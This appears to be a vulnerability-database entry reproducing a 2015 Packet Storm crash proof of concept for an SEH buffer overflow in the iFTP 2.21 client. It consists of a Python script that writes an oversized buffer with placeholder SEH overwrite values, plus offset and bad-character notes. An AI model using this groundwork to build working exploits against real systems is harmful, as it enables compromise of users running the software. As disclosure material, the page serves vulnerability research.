Lucene search
K

iFTP 2.21 Buffer Overflow

🗓️ 14 May 2015 00:00:00Reported by dogo h@ckType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

iFTP 2.21 Buffer Overflow PoC with Bad Character Cras

Code
`#!/usr/bin/python  
###########################################################################################  
#Exploit Title:iFTP 2.21 Buffer OverFlow Crash PoC  
#Author: dogo h@ck  
#Date Discovered : 12-5-2015  
#Vendor Homepage: http://www.memecode.com/iftp.php  
#Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe  
#Version: 2.21  
#Tested on : Windows XP Sp3  
###########################################################################################  
#Crash : Go to Connect > Host Address > Post it  
#Bad Characters (\x00\x09\x0a\x0d\x80 and all from \x80 To \xFF I know It's FU&^% :( )  
############################################################################################  
  
buffer = "A"*1865  
buffer +="BBBB" #Pointer to next SEH record  
buffer +="CCCC" #SE handler  
buffer +="D"*500  
file = "buffer.txt"  
  
f = open(file, "w")  
  
f.write(buffer)  
  
f.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 May 2015 00:00Current
0.4Low risk
Vulners AI Score0.4
18